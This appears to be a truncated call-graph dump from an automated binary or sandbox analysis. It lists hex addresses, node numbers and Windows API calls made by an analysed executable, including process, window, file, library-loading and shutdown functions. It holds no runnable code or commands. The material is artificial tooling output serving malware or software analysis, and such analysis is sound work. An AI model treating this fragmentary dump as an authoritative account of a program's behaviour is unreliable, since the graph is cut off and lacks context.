79 API calls 3 library calls 59487->59510 59491 11173c02 59489->59491 59490 11173a9e 59492 11173aa8 GetLocaleInfoA 59490->59492 59500 11173ad8 _LangCountryEnumProc@4 _strlen 59490->59500 59492->59486 59493 11173ac7 59492->59493 59511 111646ce 79 API calls 3 library calls 59493->59511 59494 11173b4b GetLocaleInfoA 59494->59486 59496 11173b6e 59494->59496 59513 111646ce 79 API calls 3 library calls 59496->59513 59498 11173b81 _strlen 59498->59486 59515 111739da GetLocaleInfoW _GetPrimaryLen _strlen 59498->59515 59499 11173ad2 59499->59500 59512 11163784 80 API calls 3 library calls 59499->59512 59500->59486 59500->59494 59501 11173b79 59501->59486 59501->59498 59514 111646ce 79 API calls 3 library calls 59501->59514 59516 1116b73c GetLastError 59505->59516 59507 1116b7bd 59508 1116b7ca 59507->59508 59530 1116d7aa 66 API calls 3 library calls 59507->59530 59508->59484 59510->59490 59511->59499 59512->59500 59513->59501 59514->59498 59515->59486 59531 1116b5fa TlsGetValue 59516->59531 59519 1116b7a9 SetLastError 59519->59507 59522 1116b76f DecodePointer 59523 1116b784 59522->59523 59524 1116b7a0 59523->59524 59525 1116b788 59523->59525 59527 11162be5 _free 62 API calls 59524->59527 59540 1116b688 66 API calls 4 library calls 59525->59540 59529 1116b7a6 59527->59529 59528 1116b790 GetCurrentThreadId 59528->59519 59529->59519 59532 1116b60f DecodePointer TlsSetValue 59531->59532 59533 1116b62a 59531->59533 59532->59533 59533->59519 59534 11169dbe 59533->59534 59535 11169dc7 59534->59535 59537 11169e04 59535->59537 59538 11169de5 Sleep 59535->59538 59541 11170166 59535->59541 59537->59519 59537->59522 59539 11169dfa 59538->59539 59539->59535 59539->59537 59540->59528 59542 11170172 59541->59542 59547 1117018d 59541->59547 59543 1117017e 59542->59543 59542->59547 59550 111692ef 66 API calls __getptd_noexit 59543->59550 59544 111701a0 RtlAllocateHeap 59546 111701c7 59544->59546 59544->59547 59546->59535 59547->59544 59547->59546 59551 1116d4a8 DecodePointer 59547->59551 59548 11170183 59548->59535 59550->59548 59551->59547 59552 1102e640 59553 1102e683 59552->59553 59554 1110f420 std::locale::_Init 274 API calls 59553->59554 59555 1102e68a 59554->59555 59557 1102e6aa 59555->59557 60582 11142a60 59555->60582 59939 11142bb0 59557->59939 59560 1102e701 59563 11142bb0 84 API calls 59560->59563 59562 1102e6e6 59564 11081bb0 87 API calls 59562->59564 59568 1102e72a 59563->59568 59564->59560 59565 1102e766 59566 1102e7e5 CreateEventA 59565->59566 59567 1102e7bf GetSystemMetrics 59565->59567 59574 1102e805 59566->59574 59575 1102e819 59566->59575 59567->59566 59569 1102e7ce 59567->59569 59568->59565 59572 111450a0 std::locale::_Init 93 API calls 59568->59572 59570 11146450 std::locale::_Init 21 API calls 59569->59570 59573 1102e7d8 59570->59573 59572->59565 60600 1102d330 59573->60600 60744 11029450 274 API calls 2 library calls 59574->60744 59578 1110f420 std::locale::_Init 274 API calls 59575->59578 59579 1102e820 59578->59579 59580 1102e840 59579->59580 59581 111100d0 414 API calls 59579->59581 59582 1110f420 std::locale::_Init 274 API calls 59580->59582 59581->59580 59583 1102e854 59582->59583 59584 111100d0 414 API calls 59583->59584 59585 1102e874 59583->59585 59584->59585 59586 1110f420 std::locale::_Init 274 API calls 59585->59586 59587 1102e8f3 59586->59587 59588 1110f420 std::locale::_Init 274 API calls 59587->59588 59589 1102e93d 59588->59589 59590 1102e962 FindWindowA 59589->59590 60745 11060be0 280 API calls std::locale::_Init 59589->60745 59593 1102eab7 59590->59593 59594 1102e99b 59590->59594 59943 110613d0 59593->59943 59594->59593 59597 1102e9b3 GetWindowThreadProcessId 59594->59597 59599 11146450 std::locale::_Init 21 API calls 59597->59599 59598 110613d0 276 API calls 59600 1102ead5 59598->59600 59601 1102e9d9 OpenProcess 59599->59601 59602 110613d0 276 API calls 59600->59602 59601->59593 59603 1102e9f9 59601->59603 59604 1102eae1 59602->59604 60746 11094b30 100 API calls 59603->60746 59606 1102eaf8 59604->59606 59607 1102eaef 59604->59607 59950 11145910 59606->59950 60747 11027d60 120 API calls 2 library calls 59607->60747 59608 1102ea18 59610 11146450 std::locale::_Init 21 API calls 59608->59610 59613 1102ea2c 59610->59613 59611 1102eaf4 59611->59606 59614 1102ea6b CloseHandle FindWindowA 59613->59614 59615 11146450 std::locale::_Init 21 API calls 59613->59615 59616 1102ea93 GetWindowThreadProcessId 59614->59616 59617 1102eaa7 59614->59617 59620 1102ea3e SendMessageA WaitForSingleObject 59615->59620 59616->59617 59618 11146450 std::locale::_Init 21 API calls 59617->59618 59621 1102eab4 59618->59621 59619 1102eb07 59965 11143230 59619->59965 59620->59614 59623 1102ea5e 59620->59623 59621->59593 59625 11146450 std::locale::_Init 21 API calls 59623->59625 59624 1102eb2a 59626 1102ec01 59624->59626 59976 11062d60 59624->59976 59627 1102ea68 59625->59627 59991 110274c0 59626->59991 59627->59614 59631 110b7920 std::locale::_Init 9 API calls 59632 1102eb5e 59631->59632 59634 11146450 std::locale::_Init 21 API calls 59632->59634 59633 1102ec26 59643 1102ec41 59633->59643 60010 1102a620 59633->60010 59637 1102eb70 59634->59637 59641 1102a620 std::locale::_Init 144 API calls 59641->59643 60013 110281a0 59643->60013 59940 11142bc5 59939->59940 59941 11165797 84 API calls std::locale::_Init 59940->59941 59942 1102e6d4 59940->59942 59941->59940 59942->59560 60590 11081bb0 59942->60590 59944 11061446 59943->59944 59945 110613f7 59943->59945 59946 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59944->59946 59945->59944 59948 11081bb0 87 API calls 59945->59948 60806 110612f0 276 API calls 4 library calls 59945->60806 59947 1102eac9 59946->59947 59947->59598 59948->59945 60807 11144bd0 59950->60807 59953 11144bd0 std::locale::_Init 274 API calls 59954 11145947 wsprintfA 59953->59954 59955 11143230 std::locale::_Init 8 API calls 59954->59955 59956 11145964 59955->59956 59957 11145990 59956->59957 59958 11143230 std::locale::_Init 8 API calls 59956->59958 59959 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59957->59959 59961 11145979 59958->59961 59960 1114599c 59959->59960 59960->59619 59961->59957 59962 11145980 59961->59962 59963 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59962->59963 59964 1114598c 59963->59964 59964->59619 59966 11143251 CreateFileA 59965->59966 59968 111432ee CloseHandle 59966->59968 59969 111432ce 59966->59969 59970 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59968->59970 59971 111432d2 CreateFileA 59969->59971 59972 1114330b 59969->59972 59973 11143307 59970->59973 59971->59968 59971->59972 59974 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59972->59974 59973->59624 59975 1114331a 59974->59975 59975->59624 59977 1105dd10 78 API calls 59976->59977 59978 11062d88 59977->59978 60856 11061c90 59978->60856 59980 1102eb51 59980->59626 59980->59631 59982 1105de40 5 API calls 59983 11062de9 59982->59983 59984 1105dd10 78 API calls 59983->59984 59985 11062e1d 59984->59985 59986 11062e3c 59985->59986 59989 1105de40 5 API calls 59985->59989 59987 1105dd10 78 API calls 59986->59987 59989->59986 59992 110274f4 59991->59992 59993 1105dd10 78 API calls 59992->59993 59995 11027509 59993->59995 59994 1102755f LoadIconA 59997 11027571 59994->59997 59998 1102757a GetSystemMetrics GetSystemMetrics LoadImageA 59994->59998 59995->59994 59996 11145320 std::locale::_Init 93 API calls 59995->59996 59999 110275d8 59995->59999 60001 11027542 LoadLibraryExA 59996->60001 59997->59998 60002 110275b3 59998->60002 60003 1102759f LoadIconA 59998->60003 60000 1102768c 59999->60000 60008 11081bb0 87 API calls 59999->60008 60009 111450a0 std::locale::_Init 93 API calls 59999->60009 61608 110612f0 276 API calls 4 library calls 59999->61608 60004 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 60000->60004 60001->59994 60001->60003 60002->59999 60006 110275b7 GetSystemMetrics GetSystemMetrics LoadImageA 60002->60006 60003->60002 60007 11027699 60004->60007 60006->59999 60007->59633 60008->59999 60009->59999 61609 110285f0 60010->61609 60012 1102a62e 60012->59641 60014 11146450 std::locale::_Init 21 API calls 60013->60014 60015 110281c6 60014->60015 60016 110282b4 60015->60016 60017 110281dd GetModuleFileNameA 60015->60017 61643 11013830 22 API calls 2 library calls 60016->61643 60019 11081b40 std::locale::_Init IsDBCSLeadByte 60017->60019 60021 11028201 60019->60021 60020 110282c7 60022 110282cd 60020->60022 60021->60022 60023 1102820e wsprintfA 60021->60023 60024 11146450 std::locale::_Init 21 API calls 60022->60024 60026 11028242 60023->60026 60025 110282db LoadLibraryExA 60024->60025 60026->60022 60027 1102824a WaitForSingleObject GetExitCodeProcess 60026->60027 60583 11142a6e 60582->60583 60584 11142aa8 60582->60584 60583->60584 60587 11142a92 60583->60587 60585 11142290 std::locale::_Init 274 API calls 60584->60585 60586 11142ab0 60585->60586 60586->59557 62578 11142310 276 API calls std::locale::_Init 60587->62578 60589 11142a98 60589->59557 60591 11081bbd 60590->60591 60592 11081bc2 60590->60592 62579 11081990 IsDBCSLeadByte 60591->62579 60594 11081bcb 60592->60594 60599 11081bdf 60592->60599 62580 111646ce 79 API calls 3 library calls 60594->62580 60596 11081bd8 60596->59562 60597 11081c43 60597->59562 60598 11165797 84 API calls std::locale::_Init 60598->60599 60599->60597 60599->60598 60601 11146450 std::locale::_Init 21 API calls 60600->60601 60602 1102d36c 60601->60602 60603 11145320 std::locale::_Init 93 API calls 60602->60603 60604 1102d374 60603->60604 60605 1102d3a9 GetCurrentProcess SetPriorityClass 60604->60605 60606 1102d37d InterlockedIncrement 60604->60606 60609 1102d3dd 60605->60609 60606->60605 60607 1102d38c 60606->60607 60608 11146450 std::locale::_Init 21 API calls 60607->60608 60610 1102d396 60608->60610 60611 1102d3e6 SetEvent 60609->60611 60614 1102d3ed 60609->60614 60613 1102d3a0 Sleep 60610->60613 60611->60614 60612 1102d424 60618 1102d452 60612->60618 62600 1109f1d0 279 API calls std::locale::_Init 60612->62600 60613->60613 60614->60612 62598 11029370 280 API calls 2 library calls 60614->62598 60617 1102d40d 62599 110ff6c0 279 API calls 2 library calls 60617->62599 62581 11028090 SetEvent 60618->62581 60621 1102d468 60622 1102d47d 60621->60622 62601 110ec980 291 API calls 60621->62601 60624 1102d49f 60622->60624 62602 110594a0 SetEvent 60622->62602 60626 1102d4de 60624->60626 60628 1102d4b3 Sleep 60624->60628 60627 11146450 std::locale::_Init 21 API calls 60626->60627 60629 1102d4e8 60627->60629 60628->60626 60630 1102d518 60629->60630 60632 1105dd10 78 API calls 60629->60632 60633 1102d53f 60630->60633 60637 1102d58a 60630->60637 60632->60630 62582 110affa0 60633->62582 60638 1102d5a9 60637->60638 60646 1102d5cb 60637->60646 60641 1102d5af PostThreadMessageA 60638->60641 60638->60646 60639 1102d613 60642 1102d62d 60639->60642 60652 11146450 std::locale::_Init 21 API calls 60639->60652 62605 1110f3a0 WaitForSingleObject 60641->62605 60648 1102d66b 60642->60648 60649 1102d65c 60642->60649 60643 1102d5f0 62607 11059400 DeleteCriticalSection CloseHandle 60643->62607 60646->60639 60646->60643 62606 1110f3a0 WaitForSingleObject 60646->62606 60647 1102d56a 60654 1102d57d 60647->60654 62604 111352b0 306 API calls 5 library calls 60647->62604 60651 1102d681 60648->60651 60656 11075d10 404 API calls 60648->60656 62608 11105420 26 API calls std::locale::_Init 60649->62608 60657 11146450 std::locale::_Init 21 API calls 60651->60657 60652->60642 62627 1100d4e0 FreeLibrary 60654->62627 60656->60651 60661 1102d68b 60657->60661 60659 1102d661 62609 11107b50 622 API calls std::locale::_Init 60659->62609 60665 1113cc30 309 API calls 60661->60665 60663 1102d889 60664 1102d8a0 60663->60664 62628 1100d200 wsprintfA 60663->62628 60674 1102d8c7 GetModuleFileNameA GetFileAttributesA 60664->60674 60689 1102d9fa 60664->60689 60670 1102d690 60665->60670 60666 1102d666 62610 11105ac0 356 API calls std::locale::_Init 60666->62610 60672 11146450 std::locale::_Init 21 API calls 60670->60672 60671 1102d895 60673 11146450 std::locale::_Init 21 API calls 60671->60673 60675 1102d69a 60672->60675 60673->60664 60676 1102d8ef 60674->60676 60674->60689 60677 1102d6b7 60675->60677 60678 1102d6a9 60675->60678 60681 1110f420 std::locale::_Init 274 API calls 60676->60681 60680 11146450 std::locale::_Init 21 API calls 60677->60680 62611 1109d920 WaitForSingleObject SetEvent WaitForSingleObject CloseHandle 60678->62611 60679 11146450 std::locale::_Init 21 API calls 60683 1102da92 60679->60683 60685 1102d6c1 60680->60685 60686 1102d8f6 60681->60686 62631 11146410 FreeLibrary 60683->62631 60697 1102d6d5 std::ios_base::_Tidy 60685->60697 62612 1110e5c0 DeleteCriticalSection std::ios_base::_Tidy 60685->62612 60692 11142a60 276 API calls 60686->60692 60698 1102d918 60686->60698 60688 1102da9a 60690 1102dad6 60688->60690 60693 1102dac4 ExitWindowsEx 60688->60693 60694 1102dab4 ExitWindowsEx Sleep 60688->60694 60689->60679 60695 1102dae6 60690->60695 60696 1102dadb Sleep 60690->60696 60692->60698 60693->60690 60694->60693 60700 11146450 std::locale::_Init 21 API calls 60695->60700 60696->60695 60711 1102d74f 60697->60711 62613 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 60697->62613 60703 11142bb0 84 API calls 60698->60703 60707 1102daf0 ExitProcess 60700->60707 60701 1102d75b 62615 1110fc70 287 API calls 2 library calls 60701->62615 60710 1102d93d 60703->60710 60704 1102d7e2 60709 11146450 std::locale::_Init 21 API calls 60704->60709 60705 1102d769 60705->60704 60720 1102d760 std::ios_base::_Tidy 60705->60720 60712 1102d7ec 60709->60712 60713 1102d9e3 60710->60713 60716 11081b40 std::locale::_Init IsDBCSLeadByte 60710->60716 60711->60701 60711->60705 60714 1102d7fb 60712->60714 60715 1102d809 CloseHandle 60712->60715 60713->60689 62617 1108a570 60714->62617 60721 1102d824 60715->60721 60722 1102d82a 60715->60722 60719 1102d953 60716->60719 60717 11146450 std::locale::_Init 21 API calls 60734 1102d6ff std::ios_base::_Tidy 60717->60734 60724 1102d96e _memset 60719->60724 62629 11029450 274 API calls 2 library calls 60719->62629 60720->60704 60720->60705 62616 1110fc70 287 API calls 2 library calls 60720->62616 60725 11162be5 _free 66 API calls 60721->60725 60743 1102d869 std::ios_base::_Tidy 60722->60743 62624 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 60722->62624 60723 1102d800 std::ios_base::_Tidy 60723->60715 60728 1102d988 FindFirstFileA 60724->60728 60725->60722 60730 1102d9d4 60728->60730 60731 1102d9a8 FindNextFileA 60728->60731 62630 111266e0 300 API calls 5 library calls 60730->62630 60741 1102d9c8 FindClose 60731->60741 60732 1102d858 60732->60743 62626 1110fc70 287 API calls 2 library calls 60732->62626 60733 11162be5 _free 66 API calls 60736 1102d83c 60733->60736 60734->60711 60734->60717 62614 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 60734->62614 60735 1102d7d9 std::ios_base::_Tidy 60735->60704 60736->60732 60736->60733 62625 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 60736->62625 60741->60730 60743->60654 60745->59590 60746->59608 60747->59611 60806->59945 60808 11144bf2 60807->60808 60810 11144c09 std::locale::_Init 60807->60810 60853 11029450 274 API calls 2 library calls 60808->60853 60813 11144c3c GetModuleFileNameA 60810->60813 60821 11144d97 60810->60821 60812 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 60814 11144db3 wsprintfA 60812->60814 60831 11081b40 60813->60831 60814->59953 60816 11144c51 60817 11144c61 SHGetFolderPathA 60816->60817 60830 11144d48 60816->60830 60819 11144c8e 60817->60819 60820 11144cad SHGetFolderPathA 60817->60820 60818 11142290 std::locale::_Init 271 API calls 60818->60821 60819->60820 60823 11144c94 60819->60823 60824 11144ce2 60820->60824 60821->60812 60854 11029450 274 API calls 2 library calls 60823->60854 60826 1102a620 std::locale::_Init 144 API calls 60824->60826 60828 11144cf3 60826->60828 60835 11144670 60828->60835 60830->60818 60832 11081b53 _strrchr 60831->60832 60834 11081b6a std::locale::_Init 60832->60834 60855 11081990 IsDBCSLeadByte 60832->60855 60834->60816 60836 111446fa 60835->60836 60837 1114467b 60835->60837 60836->60830 60837->60836 60838 1114468b GetFileAttributesA 60837->60838 60839 111446a5 60838->60839 60840 11144697 60838->60840 60841 11163cf8 __strdup 66 API calls 60839->60841 60840->60830 60842 111446ac 60841->60842 60843 11081b40 std::locale::_Init IsDBCSLeadByte 60842->60843 60844 111446b6 60843->60844 60845 11144670 std::locale::_Init 67 API calls 60844->60845 60852 111446d3 60844->60852 60846 111446c6 60845->60846 60847 111446dc 60846->60847 60848 111446ce 60846->60848 60849 11162be5 _free 66 API calls 60847->60849 60850 11162be5 _free 66 API calls 60848->60850 60851 111446e1 CreateDirectoryA 60849->60851 60850->60852 60851->60852 60852->60830 60855->60834 60966 11144ea0 60856->60966 60858 11061d1c 60859 110d1550 274 API calls 60858->60859 60860 11061d30 60859->60860 60862 11061f17 60860->60862 60908 11061d44 std::ios_base::_Tidy 60860->60908 60974 1116449d 60860->60974 60861 11062c88 60865 110d07c0 274 API calls 60861->60865 60864 1116449d _fgets 81 API calls 60862->60864 60863 11163db7 std::locale::_Init 104 API calls 60863->60861 60867 11061f31 60864->60867 60898 11061e11 std::ios_base::_Tidy 60865->60898 60873 11061f97 _strpbrk 60867->60873 60874 11061f38 60867->60874 60868 11061dc7 60869 11061dce 60868->60869 60882 11061e1d _strpbrk std::locale::_Init 60868->60882 60870 11061e03 60869->60870 61022 11163db7 60869->61022 60872 110d07c0 274 API calls 60870->60872 60872->60898 60993 11163676 60873->60993 60875 11061f7d 60874->60875 60879 11163db7 std::locale::_Init 104 API calls 60874->60879 60876 110d07c0 274 API calls 60875->60876 60876->60898 60878 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 60880 11062cbf 60878->60880 60879->60875 60880->59980 60880->59982 60880->59983 60882->60862 60887 11061eb8 60882->60887 60888 11061efd 60887->60888 60892 11163db7 std::locale::_Init 104 API calls 60887->60892 60889 110d07c0 274 API calls 60888->60889 60889->60898 60892->60888 60898->60878 60908->60861 60908->60863 60971 11144eb3 std::ios_base::_Tidy 60966->60971 60968 11144f1a std::ios_base::_Tidy 60968->60858 60969 11144ed5 GetLastError 60970 11144ee0 Sleep 60969->60970 60969->60971 60972 11163fed std::locale::_Init 137 API calls 60970->60972 60971->60968 60971->60969 61059 11163fed 60971->61059 60973 11144ef2 60972->60973 60973->60968 60973->60971 60975 111644a9 _fputs 60974->60975 60976 111644bc 60975->60976 60977 111644ed 60975->60977 61420 111692ef 66 API calls __getptd_noexit 60976->61420 60980 111644f2 __lock_file 60977->60980 60986 111644cc _fputs 60977->60986 60979 111644c1 61421 1116df04 11 API calls _fputs 60979->61421 60982 11164506 60980->60982 60987 11164571 60980->60987 61422 11169287 60982->61422 60984 1116459e 61431 111645cd LeaveCriticalSection LeaveCriticalSection _fgets 60984->61431 60986->60868 60987->60984 61400 11171a25 60987->61400 60990 1116450c 60990->60987 61429 111692ef 66 API calls __getptd_noexit 60990->61429 60991 11164566 60994 1116368f 60993->60994 61487 11163420 60994->61487 61023 11163dc3 _fputs 61022->61023 61024 11163dd5 61023->61024 61025 11163dea 61023->61025 61560 111692ef 66 API calls __getptd_noexit 61024->61560 61026 11163dfd __lock_file 61025->61026 61033 11163de5 _fputs 61025->61033 61544 11163d4a 61026->61544 61033->60870 61062 11163f31 61059->61062 61061 11163fff 61061->60971 61065 11163f3d _fputs 61062->61065 61063 11163f50 61119 111692ef 66 API calls __getptd_noexit 61063->61119 61065->61063 61067 11163f7d 61065->61067 61066 11163f55 61120 1116df04 11 API calls _fputs 61066->61120 61081 111716f8 61067->61081 61070 11163f82 61076 11163f60 @_EH4_CallFilterFunc@8 _fputs 61076->61061 61082 11171704 _fputs 61081->61082 61124 1117373c 61082->61124 61084 11171787 61131 11171822 61084->61131 61085 1117178e 61136 11169d79 61085->61136 61089 11171817 _fputs 61089->61070 61090 111717a3 InitializeCriticalSectionAndSpinCount 61091 111717d6 EnterCriticalSection 61090->61091 61092 111717c3 61090->61092 61091->61084 61095 11171712 61095->61084 61095->61085 61134 1117367a 66 API calls 9 library calls 61095->61134 61135 1116b048 LeaveCriticalSection LeaveCriticalSection _doexit 61095->61135 61119->61066 61120->61076 61125 11173764 EnterCriticalSection 61124->61125 61126 11173751 61124->61126 61125->61095 61142 1117367a 66 API calls 9 library calls 61126->61142 61128 11173757 61128->61125 61143 1116d7aa 66 API calls 3 library calls 61128->61143 61144 11173663 LeaveCriticalSection 61131->61144 61133 11171829 61133->61089 61134->61095 61135->61095 61138 11169d82 61136->61138 61137 11162b51 _malloc 65 API calls 61137->61138 61138->61137 61139 11169db8 61138->61139 61140 11169d99 Sleep 61138->61140 61139->61084 61139->61090 61141 11169dae 61140->61141 61141->61138 61141->61139 61142->61128 61144->61133 61401 11171a32 61400->61401 61404 11171a47 61400->61404 61465 111692ef 66 API calls __getptd_noexit 61401->61465 61403 11171a37 61466 1116df04 11 API calls _fputs 61403->61466 61406 11171a7c 61404->61406 61411 11171a42 61404->61411 61432 1117712e 61404->61432 61408 11169287 __flsbuf 66 API calls 61406->61408 61409 11171a90 61408->61409 61435 111747ed 61409->61435 61411->60987 61420->60979 61421->60986 61423 11169293 61422->61423 61424 111692a8 61422->61424 61485 111692ef 66 API calls __getptd_noexit 61423->61485 61424->60990 61426 11169298 61486 1116df04 11 API calls _fputs 61426->61486 61428 111692a3 61428->60990 61429->60991 61431->60986 61433 11169d79 __malloc_crt 66 API calls 61432->61433 61434 11177143 61433->61434 61434->61406 61465->61403 61466->61411 61485->61426 61486->61428 61499 11163399 61487->61499 61489 11163444 61507 111692ef 66 API calls __getptd_noexit 61489->61507 61495 1116347a 61500 111633ac 61499->61500 61506 111633f9 61499->61506 61501 1116b7b5 __getptd 66 API calls 61500->61501 61506->61489 61506->61495 61608->59999 61610 11028613 61609->61610 61611 11028c5b 61609->61611 61612 110286d0 GetModuleFileNameA 61610->61612 61622 11028648 61610->61622 61614 11028cf7 61611->61614 61615 11028d0a 61611->61615 61613 110286f1 _strrchr 61612->61613 61618 11163fed std::locale::_Init 137 API calls 61613->61618 61616 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 61614->61616 61617 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 61615->61617 61619 11028d06 61616->61619 61620 11028d1b 61617->61620 61621 110286cb 61618->61621 61619->60012 61620->60012 61621->61611 61637 11026890 81 API calls 2 library calls 61621->61637 61624 11163fed std::locale::_Init 137 API calls 61622->61624 61624->61621 61625 11163db7 std::locale::_Init 104 API calls 61625->61611 61626 11028744 61634 11028bc5 61626->61634 61638 11026700 66 API calls 3 library calls 61626->61638 61628 11028780 61634->61625 61634->61634 61637->61626 61638->61628 61643->60020 62578->60589 62579->60592 62580->60596 62581->60621 62632 110805f0 62582->62632 62587 1102d54a 62591 110eb080 62587->62591 62588 110affe7 62644 11029450 274 API calls 2 library calls 62588->62644 62592 110affa0 276 API calls 62591->62592 62593 110eb0ad 62592->62593 62660 110ea450 62593->62660 62595 110eb0f1 62670 110b0190 276 API calls std::locale::_Init 62595->62670 62597 1102d555 62603 110b0190 276 API calls std::locale::_Init 62597->62603 62598->60617 62599->60612 62600->60618 62601->60622 62602->60624 62603->60647 62604->60654 62605->60638 62606->60646 62608->60659 62609->60666 62610->60648 62612->60697 62613->60734 62614->60734 62615->60720 62616->60735 62618 1108a617 62617->62618 62621 1108a5aa std::ios_base::_Tidy 62617->62621 62619 1108a61e DeleteCriticalSection 62618->62619 62673 1106e1b0 62619->62673 62620 1108a5be CloseHandle 62620->62621 62621->62618 62621->62620 62623 1108a644 std::ios_base::_Tidy 62623->60723 62624->60736 62625->60736 62626->60743 62627->60663 62628->60671 62630->60713 62631->60688 62633 11080614 62632->62633 62634 11080618 62633->62634 62635 1108062f 62633->62635 62645 11029450 274 API calls 2 library calls 62634->62645 62637 11080648 62635->62637 62638 1108062c 62635->62638 62641 110aff90 62637->62641 62638->62635 62646 11029450 274 API calls 2 library calls 62638->62646 62647 110812d0 62641->62647 62648 1108131d 62647->62648 62649 110812f1 62647->62649 62652 1108136a wsprintfA 62648->62652 62653 11081345 wsprintfA 62648->62653 62649->62648 62650 1108130b 62649->62650 62651 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 62650->62651 62654 11081319 62651->62654 62659 11029450 274 API calls 2 library calls 62652->62659 62653->62648 62654->62587 62654->62588 62662 110ea45b 62660->62662 62661 110ea4f5 62661->62595 62662->62661 62663 110ea47e 62662->62663 62665 110ea495 62662->62665 62671 11029450 274 API calls 2 library calls 62663->62671 62666 110ea492 62665->62666 62667 110ea4c2 SendMessageTimeoutA 62665->62667 62666->62665 62672 11029450 274 API calls 2 library calls 62666->62672 62667->62661 62670->62597 62676 1106e1c4 62673->62676 62674 1106e1c8 62674->62623 62676->62674 62677 1106d9a0 67 API calls 2 library calls 62676->62677 62677->62676 62692 11134d10 62693 11134d19 62692->62693 62699 11134d48 62692->62699 62694 11145320 std::locale::_Init 93 API calls 62693->62694 62695 11134d1e 62694->62695 62696 11132bf0 282 API calls 62695->62696 62695->62699 62697 11134d27 62696->62697 62698 1105dd10 78 API calls 62697->62698 62697->62699 62698->62699 62700 110310c0 62701 110310ce 62700->62701 62702 11145e80 274 API calls 62701->62702 62703 110310df SetUnhandledExceptionFilter 62702->62703 62704 110310ef std::locale::_Init 62703->62704 62705 11040860 62706 11040892 62705->62706 62707 11040898 62706->62707 62712 110408b4 62706->62712 62708 110facc0 15 API calls 62707->62708 62710 110408aa CloseHandle 62708->62710 62709 110409c8 62711 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 62709->62711 62710->62712 62714 110409d5 62711->62714 62712->62709 62717 110408ed 62712->62717 62737 11087ee0 306 API calls 5 library calls 62712->62737 62713 11040948 62727 110facc0 GetTokenInformation 62713->62727 62717->62709 62717->62713 62718 1104095a 62719 11040962 CloseHandle 62718->62719 62722 11040969 62718->62722 62719->62722 62720 110409ab 62723 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 62720->62723 62721 11040991 62724 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 62721->62724 62722->62720 62722->62721 62725 110409c4 62723->62725 62726 110409a7 62724->62726 62728 110fad08 62727->62728 62729 110facf7 62727->62729 62738 110f1f50 9 API calls 62728->62738 62730 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 62729->62730 62732 110fad04 62730->62732 62732->62718 62733 110fad2c 62733->62729 62734 110fad34 62733->62734 62735 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 62734->62735 62736 110fad5a 62735->62736 62736->62718 62737->62717 62738->62733 62739 11089a40 62740 1110f6c0 ___DllMainCRTStartup 4 API calls 62739->62740 62741 11089a53 62740->62741 62743 11089a5d 62741->62743 62751 11089150 277 API calls std::locale::_Init 62741->62751 62744 11089a84 62743->62744 62752 11089150 277 API calls std::locale::_Init 62743->62752 62747 11089a93 62744->62747 62748 11089a10 62744->62748 62753 110896a0 62748->62753 62751->62743 62752->62744 62790 11088970 6 API calls ___DllMainCRTStartup 62753->62790 62755 110896d9 GetParent 62756 110896ec 62755->62756 62757 110896fd 62755->62757 62758 110896f0 GetParent 62756->62758 62759 11163fed std::locale::_Init 137 API calls 62757->62759 62758->62757 62758->62758 62760 11089716 std::ios_base::_Tidy 62759->62760 62791 11013830 22 API calls 2 library calls 62760->62791 62762 1108974a 62762->62762 62763 11143230 std::locale::_Init 8 API calls 62762->62763 62766 1108978a std::ios_base::_Tidy 62763->62766 62764 110897a5 62765 11163db7 std::locale::_Init 104 API calls 62764->62765 62768 110897c3 62764->62768 62765->62768 62766->62764 62767 11142290 std::locale::_Init 274 API calls 62766->62767 62767->62764 62770 1102a620 std::locale::_Init 144 API calls 62768->62770 62787 11089874 std::ios_base::_Tidy 62768->62787 62769 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 62771 11089962 62769->62771 62772 11089813 62770->62772 62771->62747 62773 11142290 std::locale::_Init 274 API calls 62772->62773 62774 1108981b 62773->62774 62775 11081b40 std::locale::_Init IsDBCSLeadByte 62774->62775 62776 11089832 62775->62776 62777 11081bb0 87 API calls 62776->62777 62776->62787 62778 1108984a 62777->62778 62779 1108988e 62778->62779 62780 11089851 62778->62780 62782 11081bb0 87 API calls 62779->62782 62792 110b75d0 62780->62792 62784 11089899 62782->62784 62786 110b75d0 68 API calls 62784->62786 62784->62787 62785 110b75d0 68 API calls 62785->62787 62788 110898a6 62786->62788 62787->62769 62788->62787 62789 110b75d0 68 API calls 62788->62789 62789->62787 62790->62755 62791->62762 62795 110b75b0 62792->62795 62798 111672e3 62795->62798 62801 11167264 62798->62801 62802 11167271 62801->62802 62803 1116728b 62801->62803 62819 11169302 66 API calls __getptd_noexit 62802->62819 62803->62802 62805 11167294 GetFileAttributesA 62803->62805 62807 111672a2 GetLastError 62805->62807 62813 111672b8 62805->62813 62806 11167276 62820 111692ef 66 API calls __getptd_noexit 62806->62820 62822 11169315 66 API calls 3 library calls 62807->62822 62808 